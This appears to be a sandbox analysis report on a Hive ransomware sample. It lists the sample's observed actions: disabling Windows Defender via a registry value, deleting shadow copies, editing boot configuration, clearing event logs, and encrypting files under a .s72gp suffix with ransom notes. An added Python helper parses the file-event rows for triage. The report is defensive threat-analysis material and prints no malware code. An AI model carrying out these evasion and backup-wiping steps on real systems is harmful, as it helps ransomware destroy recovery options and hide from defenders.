Analysis Overview
SHA256
a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357
Threat Level: Known bad
The file a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Modifies security service
Hive
Modifies boot configuration data using bcdedit
Deletes shadow copies
Clears Windows event logs
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Opens file in notepad (likely ransom note)
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 14:10
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 14:10
Reported
2022-01-12 14:12
Platform
win7-en-20211208
Max time kernel
104s
Max time network
12s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\builtincontrolsschema.xsd.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL058.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LABEL98.POC.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\1 Top.accdt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\mobile.html.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285780.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR16F.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\adcvbs.inc | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGZIP.DPV.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\clock.html | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AFTRNOON\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\NL.ROGERS.COM.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-2.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0295069.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00525_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSGR3FR.LEX.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LETTHEAD.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115866.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21548_.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR20F.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_left.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\css\settings.css | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\videowall.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105846.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00578_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1036\MSO.ACL.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ko.txt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152432.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hardware Tracker.fdt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\icon.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_right.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Metlakatla.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00538_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
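The table above is the sandbox's view of the encryption pass under Program Files: most files are opened for modification and renamed to `<original name>.<token>.s72gp`, a ransom note named `agQX_HOW_TO_DECRYPT.txt` is created in each directory the sample visits, and a handful of files (`.png`, `.html`, `.inc`, `.xml`, `.css`) are opened without being renamed. The part of the token before `_` is identical across every row on this page while the part after it takes two values; what either part encodes is not established by this report. The Python below is an added triage helper, not code from the report or from the sandbox: over a constructed subset of rows copied verbatim from the table, it infers the appended extension, recovers the original filenames, counts the distinct tokens, and separates renamed from not-renamed files. The suffix layout is read off the table; the helper is generic enough to run on the file-event table of another report with the same column layout.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath

# Constructed sample: (event, path) rows copied verbatim from the
# "Drops file in Program Files directory" table of this report.
SAMPLE_ROWS = [
    ("File opened for modification", r"C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\builtincontrolsschema.xsd.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp"),
    ("File opened for modification", r"C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL058.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp"),
    ("File opened for modification", r"C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png"),
    ("File created", r"C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\agQX_HOW_TO_DECRYPT.txt"),
    ("File opened for modification", r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp"),
    ("File opened for modification", r"C:\Program Files\VideoLAN\VLC\lua\http\mobile.html.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp"),
    ("File opened for modification", r"C:\Program Files (x86)\Common Files\System\msadc\adcvbs.inc"),
    ("File created", r"C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AFTRNOON\agQX_HOW_TO_DECRYPT.txt"),
    ("File opened for modification", r"C:\Program Files\7-Zip\Lang\ko.txt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp"),
    ("File opened for modification", r"C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\clock.html"),
]


def final_ext(name):
    """Lower-cased text after the last dot, or '' if the name has no dot."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def infer_encrypted_extension(rows):
    """Most common final extension among files opened for modification.
    During an encryption pass that is the appended extension (s72gp here)."""
    counts = Counter(final_ext(PureWindowsPath(p).name)
                     for ev, p in rows if ev == "File opened for modification")
    return counts.most_common(1)[0][0]


def parse_encrypted_name(name, ext):
    """Split '<original>.<token>.<ext>' into (original, token), or None if the
    name does not carry the suffix. Token character class is read off the
    table: base64url characters, i.e. letters, digits, '-' and '_'."""
    m = re.match(rf"^(?P<original>.+?)\.(?P<token>[A-Za-z0-9_-]+)\.{re.escape(ext)}$", name)
    return (m["original"], m["token"]) if m else None


def triage_file_events(rows):
    """Summarise an encryption pass: appended extension, recovered original
    names, token frequencies, files opened but not renamed, ransom note names."""
    ext = infer_encrypted_extension(rows)
    summary = {"extension": ext, "encrypted": [], "tokens": Counter(),
               "not_renamed": [], "ransom_notes": Counter()}
    for ev, path in rows:
        name = PureWindowsPath(path).name
        if ev == "File created":
            summary["ransom_notes"][name] += 1   # same note name dropped per directory
            continue
        parsed = parse_encrypted_name(name, ext) if final_ext(name) == ext else None
        if parsed:
            summary["encrypted"].append(parsed[0])
            summary["tokens"][parsed[1]] += 1
        else:
            summary["not_renamed"].append(name)  # opened, but no suffix recorded
    return summary


if __name__ == "__main__":
    s = triage_file_events(SAMPLE_ROWS)
    print(f"appended extension: .{s['extension']}")
    print(f"{len(s['encrypted'])} renamed, {len(s['not_renamed'])} opened but not renamed")
    print("ransom notes:", dict(s["ransom_notes"]))
    for token, n in s["tokens"].items():
        print(f"{n}x token {token}")
```

The not-renamed list is worth keeping separate rather than discarding: the detonation ran for 104 s of kernel time, so those rows may be files the sample had opened but not finished with when the run ended, or files it deliberately skipped; the report does not say which, and the helper does not guess.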
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
